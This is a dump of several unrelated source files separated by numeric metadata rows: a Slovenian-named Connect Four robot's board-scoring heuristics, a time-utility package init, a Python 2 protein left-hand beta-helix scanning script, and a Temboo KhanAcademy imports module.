            if [self.polje[i - k][j + k] for k in range(4)] == ["O"] * 4:
                return True

def zmaga_0(self):
    """Return True on any non-vertical "O" four-in-a-row.

    Verticals are excluded here as in the original — presumably deliberate
    for the robot's forced-win check; confirm against the caller.  bool()
    replaces the original trailing `== True` precedence trap.
    """
    return bool(self.vodoravno_4_0() or self.posevno2_4_0() or self.posevno_4_0())
######################################################################################################################################################################
def vodoravno_3(self):
    """Count horizontal runs of three "O"s (overlapping windows included)."""
    stevilo = 0
    for i in range(6):
        for j in range(5):
            if self.polje[i][j:j + 3] == ["O"] * 3:
                stevilo += 1
    return stevilo

def navpicno_3(self):
    """Count vertical runs of three "O"s."""
    stevilo = 0
    for i in range(4):
        for j in range(7):
            if [self.polje[i + k][j] for k in range(3)] == ["O"] * 3:
                stevilo += 1
    return stevilo

def posevno_3(self):
    """Count down-right diagonal runs of three "O"s."""
    stevilo = 0
    for i in range(4):
        for j in range(5):
            if [self.polje[i + k][j + k] for k in range(3)] == ["O"] * 3:
                stevilo += 1
    return stevilo

def posevno2_3(self):
    """Count up-right diagonal runs of three "O"s.

    range(2, 6) fixes the original range(2, 5), which skipped windows
    starting on row 5.
    """
    stevilo = 0
    for i in range(2, 6):
        for j in range(5):
            if [self.polje[i - k][j + k] for k in range(3)] == ["O"] * 3:
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def vodoravno_2_0(self):
    """Count horizontal "OO" pairs.

    range(6) fixes the original range(5), which never examined the pair
    in columns 5-6.
    """
    stevilo = 0
    for i in range(6):
        for j in range(6):
            if self.polje[i][j] == "O" and self.polje[i][j + 1] == "O":
                stevilo += 1
    return stevilo

def navpicno_2_0(self):
    """Count vertical "OO" pairs."""
    stevilo = 0
    for i in range(5):
        for j in range(7):
            if self.polje[i][j] == "O" and self.polje[i + 1][j] == "O":
                stevilo += 1
    return stevilo

def posevno_2_0(self):
    """Count down-right diagonal "OO" pairs."""
    stevilo = 0
    for i in range(5):
        for j in range(6):
            if self.polje[i][j] == "O" and self.polje[i + 1][j + 1] == "O":
                stevilo += 1
    return stevilo

def posevno2_2_0(self):
    """Count up-right diagonal "OO" pairs.

    range(1, 6) fixes the original range(1, 5), which skipped pairs
    starting on row 5.
    """
    stevilo = 0
    for i in range(1, 6):
        for j in range(6):
            if self.polje[i][j] == "O" and self.polje[i - 1][j + 1] == "O":
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def blokada_zmage_vodoravno(self):
    """Count horizontal 4-windows holding exactly three "X"s and one "O".

    The four explicit patterns of the original (O in each of the four slots)
    are exactly the windows with count(X) == 3 and count(O) == 1.
    """
    stevilo = 0
    for i in range(6):
        for j in range(4):
            okno = self.polje[i][j:j + 4]
            if okno.count("X") == 3 and okno.count("O") == 1:
                stevilo += 1
    return stevilo

def blokada_zmage_navpicno(self):
    """Count vertical 4-windows holding three "X"s and one "O"."""
    stevilo = 0
    for i in range(3):
        for j in range(7):
            okno = [self.polje[i + k][j] for k in range(4)]
            if okno.count("X") == 3 and okno.count("O") == 1:
                stevilo += 1
    return stevilo

def blokada_zmage_posevno(self):
    """Count down-right diagonal 4-windows holding three "X"s and one "O"."""
    stevilo = 0
    for i in range(3):
        for j in range(4):
            okno = [self.polje[i + k][j + k] for k in range(4)]
            if okno.count("X") == 3 and okno.count("O") == 1:
                stevilo += 1
    return stevilo

def blokada_zmaga_posevno2(self):
    """Count up-right diagonal 4-windows holding three "X"s and one "O".

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    stevilo = 0
    for i in range(3, 6):
        for j in range(4):
            okno = [self.polje[i - k][j + k] for k in range(4)]
            if okno.count("X") == 3 and okno.count("O") == 1:
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def blokada_zmage_vodoravno_O(self):
    """Count horizontal 4-windows holding exactly three "O"s and one "X".

    The four explicit patterns of the original are exactly the windows
    with count(O) == 3 and count(X) == 1.
    """
    stevilo = 0
    for i in range(6):
        for j in range(4):
            okno = self.polje[i][j:j + 4]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo

def blokada_zmage_posevno_O(self):
    """Count down-right diagonal 4-windows holding three "O"s and one "X"."""
    stevilo = 0
    for i in range(3):
        for j in range(4):
            okno = [self.polje[i + k][j + k] for k in range(4)]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo

def blokada_zmaga_posevno2_O(self):
    """Count up-right diagonal 4-windows holding three "O"s and one "X".

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    stevilo = 0
    for i in range(3, 6):
        for j in range(4):
            okno = [self.polje[i - k][j + k] for k in range(4)]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def blokada_vodoravno_3(self):
    """Count horizontal 3-windows holding exactly two "X"s and one "O".

    The original's three patterns (XXO, OXX, XOX) are exactly the windows
    with count(X) == 2 and count(O) == 1.
    """
    stevilo = 0
    for i in range(6):
        for j in range(5):
            okno = self.polje[i][j:j + 3]
            if okno.count("X") == 2 and okno.count("O") == 1:
                stevilo += 1
    return stevilo

def blokada_navpicno_3(self):
    """Count vertical 3-windows holding two "X"s and one "O"."""
    stevilo = 0
    for i in range(4):
        for j in range(7):
            okno = [self.polje[i + k][j] for k in range(3)]
            if okno.count("X") == 2 and okno.count("O") == 1:
                stevilo += 1
    return stevilo

def blokada_posevno_3(self):
    """Count down-right diagonal 3-windows holding two "X"s and one "O"."""
    stevilo = 0
    for i in range(4):
        for j in range(5):
            okno = [self.polje[i + k][j + k] for k in range(3)]
            if okno.count("X") == 2 and okno.count("O") == 1:
                stevilo += 1
    return stevilo

def blokada_posevno2_3(self):
    """Count up-right diagonal 3-windows holding two "X"s and one "O".

    range(2, 6) fixes the original range(2, 5), which skipped windows
    starting on row 5.
    """
    stevilo = 0
    for i in range(2, 6):
        for j in range(5):
            okno = [self.polje[i - k][j + k] for k in range(3)]
            if okno.count("X") == 2 and okno.count("O") == 1:
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def blokada_vodoravno_2(self):
    """Count horizontal adjacent X/O pairs (either order).

    range(6) fixes the original range(5), which never examined the pair
    in columns 5-6.
    """
    stevilo = 0
    for i in range(6):
        for j in range(6):
            par = (self.polje[i][j], self.polje[i][j + 1])
            if par == ("X", "O") or par == ("O", "X"):
                stevilo += 1
    return stevilo

def blokada_navpicno_2(self):
    """Count vertical adjacent X/O pairs (either order)."""
    stevilo = 0
    for i in range(5):
        for j in range(7):
            par = (self.polje[i][j], self.polje[i + 1][j])
            if par == ("X", "O") or par == ("O", "X"):
                stevilo += 1
    return stevilo

def blokada_posevno_2(self):
    """Count down-right diagonal adjacent X/O pairs (either order)."""
    stevilo = 0
    for i in range(5):
        for j in range(6):
            par = (self.polje[i][j], self.polje[i + 1][j + 1])
            if par == ("X", "O") or par == ("O", "X"):
                stevilo += 1
    return stevilo

def blokada_posevno2_2(self):
    """Count up-right diagonal adjacent X/O pairs (either order).

    range(1, 6) fixes the original range(1, 5), which skipped pairs
    starting on row 5.
    """
    stevilo = 0
    for i in range(1, 6):
        for j in range(6):
            par = (self.polje[i][j], self.polje[i - 1][j + 1])
            if par == ("X", "O") or par == ("O", "X"):
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def blokada_nase_zmage_vodoravno(self):
    """Count horizontal 4-windows where one "X" blocks three of our "O"s.

    The four explicit patterns of the original are exactly the windows
    with count(O) == 3 and count(X) == 1.
    """
    stevilo = 0
    for i in range(6):
        for j in range(4):
            okno = self.polje[i][j:j + 4]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo

def blokada_nase_zmage_navpicno(self):
    """Count vertical 4-windows with three "O"s and one blocking "X"."""
    stevilo = 0
    for i in range(3):
        for j in range(7):
            okno = [self.polje[i + k][j] for k in range(4)]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo

def blokada_nase_zmage_posevno(self):
    """Count down-right diagonal 4-windows with three "O"s and one "X"."""
    stevilo = 0
    for i in range(3):
        for j in range(4):
            okno = [self.polje[i + k][j + k] for k in range(4)]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo

def blokada_nase_zmage_posevno2(self):
    """Count up-right diagonal 4-windows with three "O"s and one "X".

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    stevilo = 0
    for i in range(3, 6):
        for j in range(4):
            okno = [self.polje[i - k][j + k] for k in range(4)]
            if okno.count("O") == 3 and okno.count("X") == 1:
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def zmaga_vodoravno_presledek(self):
    """Count horizontal 4-windows with three "O"s and one empty cell.

    The four explicit patterns of the original are exactly the windows
    with count(O) == 3 and count(" ") == 1 (a gappy three, one move from
    a four-in-a-row).
    """
    stevilo = 0
    for i in range(6):
        for j in range(4):
            okno = self.polje[i][j:j + 4]
            if okno.count("O") == 3 and okno.count(" ") == 1:
                stevilo += 1
    return stevilo

def zmaga_posevno_presledek(self):
    """Count down-right diagonal 4-windows with three "O"s and one empty cell."""
    stevilo = 0
    for i in range(3):
        for j in range(4):
            okno = [self.polje[i + k][j + k] for k in range(4)]
            if okno.count("O") == 3 and okno.count(" ") == 1:
                stevilo += 1
    return stevilo

def zmaga_posevno2_presledek(self):
    """Count up-right diagonal 4-windows with three "O"s and one empty cell.

    range(3, 6) fixes the original range(3, 5), which skipped windows
    starting on row 5.
    """
    stevilo = 0
    for i in range(3, 6):
        for j in range(4):
            okno = [self.polje[i - k][j + k] for k in range(4)]
            if okno.count("O") == 3 and okno.count(" ") == 1:
                stevilo += 1
    return stevilo
######################################################################################################################################################################
def izbira_poteze_robot(self):
    """Pick the robot's column.

    Scores every legal column with a stack of heuristics (each probes the
    board by placing and then removing trial coins) and returns a random
    choice among the highest-scoring columns.  Returns None when no legal
    move exists.
    """
    slovar = {}          # column -> accumulated heuristic score
    dobre_poteze = []    # best-scoring columns
    seznam = []          # scores gathered for max()
    for izbira in self.seznam_pravilnih():
        slovar[izbira] = 0
    # Prefer the centre columns (2, 3, 4).
    for izbira in self.seznam_pravilnih():
        if izbira == 2 or izbira == 3 or izbira == 4:
            slovar[izbira] = slovar[izbira] + 150
    # Prefer low columns (stack height 1-3).
    for izbira in self.seznam_pravilnih():
        if self.get_visina(izbira) == 1 or self.get_visina(izbira) == 2 or self.get_visina(izbira) == 3:
            slovar[izbira] = slovar[izbira] + 150
    # Immediate win: overwhelming bonus.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        if self.zmaga() == True:
            slovar[izbira] = slovar[izbira] + 100000000000000000000000000000000000000
        self.odstrani_kovanec(izbira)
    # Reward building our own three-in-a-rows.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        slovar[izbira] = slovar[izbira] + (self.vodoravno_3() + self.navpicno_3() + self.posevno_3() + self.posevno2_3()) * 2700
        self.odstrani_kovanec(izbira)
    # Reward building our own pairs.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        slovar[izbira] = slovar[izbira] + (self.vodoravno_2_0() + self.navpicno_2_0() + self.posevno_2_0() + self.posevno2_2_0())*300
        self.odstrani_kovanec(izbira)
    # Penalty: after our coin, the opponent could drop on top and win.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        if self.get_visina(izbira) != 6:
            self.dodaj_kovanec_X(izbira)
            if self.zmaga() == True:
                slovar[izbira] = slovar[izbira] - 10000000000000000000000
            self.odstrani_kovanec(izbira)
        self.odstrani_kovanec(izbira)
    # Penalty: after our coin, the opponent's reply on top would spoil a
    # prepared "three O + one X" four (blocked-win count k rises to l).
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        k = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
        if self.get_visina(izbira) != 6:
            self.dodaj_kovanec_X(izbira)
            l = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
            if k < l:
                slovar[izbira] = slovar[izbira] - 100000000
            self.odstrani_kovanec(izbira)
        self.odstrani_kovanec(izbira)
    # Huge bonus for moves that block an opponent win.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        slovar[izbira] = slovar[izbira] + (self.blokada_zmage_vodoravno() + self.blokada_zmage_navpicno() + self.blokada_zmage_posevno() + self.blokada_zmaga_posevno2())*10000000000000000000000000000
        self.odstrani_kovanec(izbira)
    # Forced win: even if the opponent blocks on top, our next coin wins.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        k = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
        if self.get_visina(izbira) < 5:
            self.dodaj_kovanec_X(izbira)
            l = self.blokada_zmage_vodoravno_O() + self.blokada_zmage_posevno_O() + self.blokada_zmaga_posevno2_O()
            if k < l:
                self.dodaj_kovanec_O(izbira)
                if self.zmaga_0() == True:
                    slovar[izbira] = slovar[izbira] + 100000000000000000
                self.odstrani_kovanec(izbira)
            self.odstrani_kovanec(izbira)
        self.odstrani_kovanec(izbira)
    # Reward blocking the opponent's three-in-a-rows.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        slovar[izbira] = slovar[izbira] + (self.blokada_vodoravno_3() + self.blokada_navpicno_3() + self.blokada_posevno_3() + self.blokada_posevno2_3())*1000
        self.odstrani_kovanec(izbira)
    # Reward gappy threes (three O plus one empty cell in a 4-window).
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        slovar[izbira] = slovar[izbira] + (self.zmaga_vodoravno_presledek() + self.zmaga_posevno_presledek() + self.zmaga_posevno2_presledek()) * 2000
        self.odstrani_kovanec(izbira)
    # Avoid completing a vertical three right at the top of a column.
    for izbira in self.seznam_pravilnih():
        k = self.navpicno_3()
        self.dodaj_kovanec_O(izbira)
        if self.get_visina(izbira) == 6:
            l = self.navpicno_3()
            if k < l:
                slovar[izbira] = slovar[izbira] - 2000
        self.odstrani_kovanec(izbira)
    # Avoid building a three into the corner columns (0 and 6).
    for izbira in self.seznam_pravilnih():
        k = self.vodoravno_3() + self.posevno_3() + self.posevno2_3()
        self.dodaj_kovanec_O(izbira)
        if izbira == 0 or izbira == 6:
            l = self.vodoravno_3() + self.posevno_3() + self.posevno2_3()
            if k < l:
                slovar[izbira] = slovar[izbira] - 2000
        self.odstrani_kovanec(izbira)
    # Double threat: after our move, at least two distinct follow-up wins.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_O(izbira)
        stevilo_zmag = 0
        for i in self.seznam_pravilnih():
            self.dodaj_kovanec_O(i)
            stevilo_zmag += self.st_zmag()
            self.odstrani_kovanec(i)
        if stevilo_zmag >= 2:
            slovar[izbira] = slovar[izbira] + 10000000000000000
        self.odstrani_kovanec(izbira)
    # Block the move that would give the opponent a double threat.
    for izbira in self.seznam_pravilnih():
        self.dodaj_kovanec_X(izbira)
        stevilo_porazov = 0
        for i in self.seznam_pravilnih():
            self.dodaj_kovanec_X(i)
            stevilo_porazov += self.st_zmag()
            self.odstrani_kovanec(i)
        if stevilo_porazov >= 2:
            slovar[izbira] = slovar[izbira] + 100000000000000
        self.odstrani_kovanec(izbira)
    # Pick uniformly at random among the best-scoring columns.
    for n in self.seznam_pravilnih():
        seznam.append(slovar[n])
    if seznam == []:
        return None
    else:
        m = max(seznam)
        for j in self.seznam_pravilnih():
            if slovar[j] == m:
                dobre_poteze.append(j)
        k = random.randint(0, len(dobre_poteze) - 1)
        if self.seznam_pravilnih() == []:
            return None
        else:
            return dobre_poteze[k]
def izbira_poteze_robot_easy(self):
    """Easy robot: pick a uniformly random column 0-6 (may be full)."""
    # randrange(7) draws from the same stream as randint(0, 6).
    return random.randrange(7)
def zeton_na_mestu(self, vrstica, stolpec):
    """Return the cell content at (vrstica, stolpec)."""
    vrsta = self.polje[vrstica]
    return vrsta[stolpec]
| 47.895105
| 291
| 0.421789
| 5,605
| 41,094
| 3.027297
| 0.028189
| 0.24558
| 0.265794
| 0.22678
| 0.84954
| 0.813119
| 0.790429
| 0.773574
| 0.753124
| 0.707921
| 0
| 0.042529
| 0.372317
| 41,094
| 858
| 292
| 47.895105
| 0.614872
| 0.010269
| 0
| 0.615172
| 0
| 0
| 0.016958
| 0.001527
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09931
| false
| 0
| 0.002759
| 0.001379
| 0.211034
| 0.005517
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
84bd579e8291220e1c2e68e475708df307230d0e
| 511
|
py
|
Python
|
timeutil/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
timeutil/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
timeutil/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
from .timeutil import (
formats,
parse,
format,
format_ts,
utc_datetime_to_ts,
datetime_to_ts,
ts_to_datetime,
ts,
ms,
us,
ns,
ms_to_ts,
us_to_ts,
ns_to_ts,
to_sec,
is_timestamp,
)
__all__ = [
'formats',
'parse',
'format',
'format_ts',
'utc_datetime_to_ts',
'datetime_to_ts',
'ts_to_datetime',
'ts',
'ms',
'us',
'ns',
'ms_to_ts',
'us_to_ts',
'ns_to_ts',
'to_sec',
'is_timestamp',
]
| 13.447368
| 25
| 0.530333
| 68
| 511
| 3.455882
| 0.25
| 0.170213
| 0.204255
| 0.204255
| 0.910638
| 0.910638
| 0.910638
| 0.910638
| 0.910638
| 0.910638
| 0
| 0
| 0.332681
| 511
| 37
| 26
| 13.810811
| 0.68915
| 0
| 0
| 0
| 0
| 0
| 0.240705
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027778
| 0
| 0.027778
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84c966d96e3612c4e562eab54b33ceccedf6292f
| 7,055
|
py
|
Python
|
LHBproteinSearch.py
|
youdar/Threading-LHBH
|
4edb2c1ead98e02a65e49342a5f699fa35cb260b
|
[
"MIT"
] | null | null | null |
LHBproteinSearch.py
|
youdar/Threading-LHBH
|
4edb2c1ead98e02a65e49342a5f699fa35cb260b
|
[
"MIT"
] | null | null | null |
LHBproteinSearch.py
|
youdar/Threading-LHBH
|
4edb2c1ead98e02a65e49342a5f699fa35cb260b
|
[
"MIT"
] | null | null | null |
'''
LHBproteinSearch.py is a program that contains search functions that
search a pdb file for regions of possible left-hand-beta-helix structure
'''
# Import modules
import numpy as nm
import string as st
import pylab as pl
import copy as cp
import time
from TheaderCommonFunctions import *
from ReadDate import *
from ThreadClasses import *
from AminoData import *
def SearchLHB18(pbdFileName,shortl=1,longl=2,pseq_length=42,minLoopDis=16):
    '''
    Scan a protein sequence for possible LHB-18 (left-hand-beta-helix) regions.

    The sequence is scored in overlapping windows of pseq_length residues,
    advanced six residues (one helix side) at a time, and the per-window
    scores are plotted with pylab.

    pbdFileName : the name of the pdb file
    shortl=1,longl=2,minLoopDis=16 : default parameters for scoring
    pseq_length is length of the sub sequence on which we run the scoring algorithm

    NOTE(review): Python 2 code (print statements; n_iter below relies on
    integer division).  The pbdFileName argument is only used in the plot
    title — the sequence actually comes from the hard-coded test file
    below; confirm this is intentional.
    '''
    start_time = time.clock()
    print 'Searching for possible LHB18 structure' # Making sure we are running the LHB-18 search
    # General amino acid data, tables
    #AAlist = AminoList()
    #aminotable = AminoTable()
    # Structure rule file name and location (hard-coded Windows path)
    s_file_name = 'StructureFile-LeftBetaH-18.txt'
    s_file_path = 'C://Users//youval//Documents//Education//work biophy//Structure and scoring rules//'
    Structure_rules = read_structure_rules(s_file_name, s_file_path)
    # init: package the rules and loop-scoring parameters for the scorer
    BaseData = BaseInputData(Structure_rules)
    BaseData.shortl = shortl
    BaseData.longl = longl
    BaseData.maxLoopFlag = minLoopDis
    # Scoring parameters
    ScoresP = ScoreParameters()
    # reading protein sequence
    #pbdFileName += '.pdb'
    #file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//pdb files//'
    #file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//Diseas related proteins//p53//'
    file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//test//'
    file_name = 'testLBH'
    seq = read_seq_file(file_name, file_path) # Get amino acid sequence
    #seq = Get_pdb_seq_info(file_name, file_path) # Get amino acid from pdb file
    seq = seq.upper()
    # parse the sequence in windows stepped by one helix side
    side_length = 6 # side length in the LHB structure model
    n_iter = (len(seq)- pseq_length)/side_length + 1 # number of iterations (Py2 integer division)
    scores_array = nm.zeros(n_iter) # Array for results collection
    x = nm.array(range(n_iter))
    for i in x:
        ii = i * side_length
        p_seq = seq[ii:(ii+pseq_length)] # sending two turns for scoring
        score = get_seq_score(Structure_rules,p_seq,BaseData,ScoresP)
        scores_array[i] = score # Collect the scores
    # Calculation time
    dtime = (time.clock() - start_time)/60
    print 'Calculation time is %.1f min' % dtime
    # Evaluating LHB regions: threshold score 70 into a 100/10 step signal
    x2 = nm.array([])
    for i in scores_array:
        if i>70:x2 = nm.append(x2,100)
        else:x2 = nm.append(x2,10)
    # Plotting
    x *= side_length # adjusting the values of x to represent amino acid number
    TitleString = 'Scores for %s - steps of %i amino acids' % (pbdFileName,side_length)
    xLabelStr = 'Position - amino acid start + %i, loops (%i : %i) ' % (pseq_length,shortl,longl)
    yLabelStr = 'Scores'
    #pl.subplot(311)
    pl.figure(1)
    pl.title(TitleString)
    pl.xlabel(xLabelStr)
    pl.ylabel(yLabelStr)
    pl.plot(x,scores_array,'r--o') # r for red, --o both dash line and dots
    pl.ylim((0,120))
    pl.xlim((0,(len(seq)+10)))
    #pl.figure(2)
    #pl.subplot(313)
    #TitleString = 'Estimated possible LBH regions'
    #pl.title(TitleString)
    #pl.xlabel(xLabelStr)
    #pl.plot(x,x2,'b')
    #pl.ylim((0,120))
    #pl.xlim((0,(len(seq)+10)))
    pl.show()
def SearchLHB15(pbdFileName,shortl=1,longl=2,pseq_length=42,minLoopDis=16):
'''
This function scans a pdb file for possible LHB-18 regions
It outputs a list where all LHB marked by 1 and other structures marked by 0
It output the list of amino acids in the LHB regions and the possible threads
pbdFileName : the name of the pdb file
shortl=1,longl=2,minLoopDis=16 : default parameters for scoring
pseq_length is length of the of sub sequence on which we run the scoring algorithm
'''
start_time = time.clock()
print 'Searching for possible LHB15 structure' # Making sure we running LHB-15 search
# Structure rule file name and location
s_file_name = 'StructureFile-LeftBetaH-15.txt'
s_file_path = 'C://Users//youval//Documents//Education//work biophy//Structure and scoring rules//'
Structure_rules = read_structure_rules(s_file_name, s_file_path)
# init
BaseData = BaseInputData(Structure_rules)
BaseData.shortl = shortl
BaseData.longl = longl
BaseData.maxLoopFlag = minLoopDis
# Scoring parameters
ScoresP = ScoreParameters()
# reading protein sequence
#pbdFileName += '.pdb'
#file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//pdb files//'
#file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//Diseas related proteins//p53//'
file_path = 'C://Users//youval//Documents//Education//work biophy//Protein seq//test//'
file_name = 'testLBH'
seq = read_seq_file(file_name, file_path) # Get amino acid sequence
#seq = Get_pdb_seq_info(pbdFileName, file_path) # Get amino acid from pdb file
seq = seq.upper()
# parce the sequence
side_length = 5 # side length in the LHB structure model
n_iter = (len(seq)- pseq_length)/side_length + 1 # number of iterations
scores_array = nm.zeros(n_iter) # Array for results collection
x = nm.array(range(n_iter))
for i in x:
ii = i * side_length
p_seq = seq[ii:(ii+pseq_length)] # sending two turns for scoring
score = get_seq_score(Structure_rules,p_seq,BaseData,ScoresP)
scores_array[i] = score # Collect the scores
# Calculation time
dtime = (time.clock() - start_time)/60
print 'Calculation time is %.1f min' % dtime
# Evaluating LHB regions
x2 = nm.array([])
for i in scores_array:
if i>70:x2 = nm.append(x2,100)
else:x2 = nm.append(x2,10)
# Plotting
x *= side_length # addjusting the valuse of x to represent amino acid number
TitleString = 'Scores for %s - steps of %i amino acids' % (pbdFileName,side_length)
xLabelStr = 'Position - amino acid start + %i, loops (%i : %i) ' % (pseq_length,shortl,longl)
yLabelStr = 'Scores'
#pl.subplot(311)
pl.figure(1)
pl.title(TitleString)
pl.xlabel(xLabelStr)
pl.ylabel(yLabelStr)
pl.plot(x,scores_array,'r--o') # r fro red, --o both dash line and dots
pl.ylim((0,90))
pl.xlim((0,(len(seq)+10)))
#pl.figure(2)
#pl.subplot(313)
#TitleString = 'Estimated possible LBH regions'
#pl.title(TitleString)
#pl.xlabel(xLabelStr)
#pl.plot(x,x2,'b')
#pl.ylim((0,120))
#pl.xlim((0,(len(seq)+10)))
pl.show()
# Run the LHB-18 search on the 'Prion' sequence:
# window of 7 sides * 6 residues = 42, minimum loop distance 17.
SearchLHB18('Prion',1,2,7*6,17)
# Alternative LHB-15 search (window of 12 sides * 5 residues = 60):
#SearchLHB15('Prion',1,2,12*5,14)
| 39.858757
| 116
| 0.678526
| 1,021
| 7,055
| 4.593536
| 0.208619
| 0.023881
| 0.015352
| 0.023881
| 0.899147
| 0.899147
| 0.885928
| 0.884222
| 0.884222
| 0.884222
| 0
| 0.025811
| 0.209213
| 7,055
| 176
| 117
| 40.085227
| 0.814841
| 0.283345
| 0
| 0.787234
| 0
| 0
| 0.181749
| 0.060499
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.095745
| null | null | 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84de2d1fca524d475ae6a23c5731b49e2379a0ce
| 1,243
|
py
|
Python
|
temboo/core/Library/KhanAcademy/Users/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/KhanAcademy/Users/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/KhanAcademy/Users/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.KhanAcademy.Users.CurrentUser import CurrentUser, CurrentUserInputSet, CurrentUserResultSet, CurrentUserChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetExercise import GetExercise, GetExerciseInputSet, GetExerciseResultSet, GetExerciseChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetExerciseFollowUp import GetExerciseFollowUp, GetExerciseFollowUpInputSet, GetExerciseFollowUpResultSet, GetExerciseFollowUpChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetExerciseLog import GetExerciseLog, GetExerciseLogInputSet, GetExerciseLogResultSet, GetExerciseLogChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetUserExercises import GetUserExercises, GetUserExercisesInputSet, GetUserExercisesResultSet, GetUserExercisesChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetUserVideos import GetUserVideos, GetUserVideosInputSet, GetUserVideosResultSet, GetUserVideosChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetVideo import GetVideo, GetVideoInputSet, GetVideoResultSet, GetVideoChoreographyExecution
from temboo.Library.KhanAcademy.Users.GetVideoLog import GetVideoLog, GetVideoLogInputSet, GetVideoLogResultSet, GetVideoLogChoreographyExecution
| 138.111111
| 185
| 0.909895
| 88
| 1,243
| 12.852273
| 0.431818
| 0.070734
| 0.120248
| 0.198055
| 0.233422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045052
| 1,243
| 8
| 186
| 155.375
| 0.952822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
84e825ded4cea25baefeda368c7bc479ac1ed7a9
| 10,949
|
py
|
Python
|
wiki_url_fix.py
|
matsujirushi/wiki-documents
|
2e7b72667788c6c22c0768853fb48683027b3a9f
|
[
"MIT"
] | 10
|
2020-11-17T00:23:44.000Z
|
2021-11-21T10:11:52.000Z
|
wiki_url_fix.py
|
